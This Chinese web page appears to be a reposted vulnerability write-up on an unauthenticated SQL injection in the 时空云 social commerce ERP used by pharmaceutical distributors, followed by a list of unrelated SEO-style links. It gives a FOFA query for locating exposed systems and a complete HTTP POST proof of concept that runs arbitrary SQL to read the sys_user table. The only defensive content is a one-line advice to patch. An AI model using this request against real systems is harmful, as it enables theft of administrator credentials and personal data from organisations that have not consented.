当前位置: 首页 > news >正文

衡水企业做网站注册免费网站区域名

衡水企业做网站,注册免费网站区域名,威联通如何做网站,网站新建设请示0x01 产品简介 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本…

0x01 产品简介

 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

  时空云社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

PoC

POST /slogin/service?service=db.select HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 75params=%7B%22sql%22%3A%22select+%2A+from+sys_user+where+rownum+%3C+10%22%7D

查询系统用户表中所有列的9条数据

0x05 修复建议 

厂商已发布了漏洞修复程序,请及时关注更新:http://www.ysk360.com/

http://www.15wanjia.com/news/183262.html

相关文章:

  • 那个网站是响应式的宁波网站建设的过程
  • 建站工具有哪些论坛开发公司资质等级
  • 网站经营范围wordpress后台中文设置
  • 出名的网站建设公司门户网是什么
  • 网站的布局结构三种北京最贵商场
  • 模板型网站建设郑州做网站公
  • 设计网站首页步骤wordpress文章页标题优化
  • 国外校园网站建设分析wordpress tw
  • dw做的网站如何使用商丘app开发
  • 卖机械设备什么网站做推广好怎么查公司的邮箱
  • 青岛网站定制开发网站建设公司对比
  • 南宁有什么做网站的好公司win8风格 网站模板
  • 建行网站关于我们网站建设注册什么公司好
  • 注册域名去哪个网站好做网站需要的注意事项
  • 门户网站后台管理模板wordpress机械模板下载地址
  • 网站外链工具做企业网站需要什么条件
  • 东莞建站公司案例全网天下案例用路由器做简单的网站
  • 做擦边网站 服务器云南省网站建设公司
  • 成都网站建设推广公司网站建设劳伦
  • 英国网站后缀wordpress借贷
  • 苏州哪家做网站好些什么是响应网站设计
  • 景区网站建设 现状百度ai智能写作工具
  • 网站 配色方案软件制作过程
  • 建设高校实验室教学网站的作用html5网站后台页面设计
  • 图片上传 网站建设教学视频教程旅游网站开发需求分析
  • 阿里云网站域名证书wordpress标签标题
  • 正规漫画网站开发流程网站建设一定要买数据盘吗
  • 网站开发软件是什么专业哈尔滨模板自助建站
  • 网站服务器可以做家用电脑备案资料 网站建设方案书
  • 做网站制作怎么样小制作大全简单又漂亮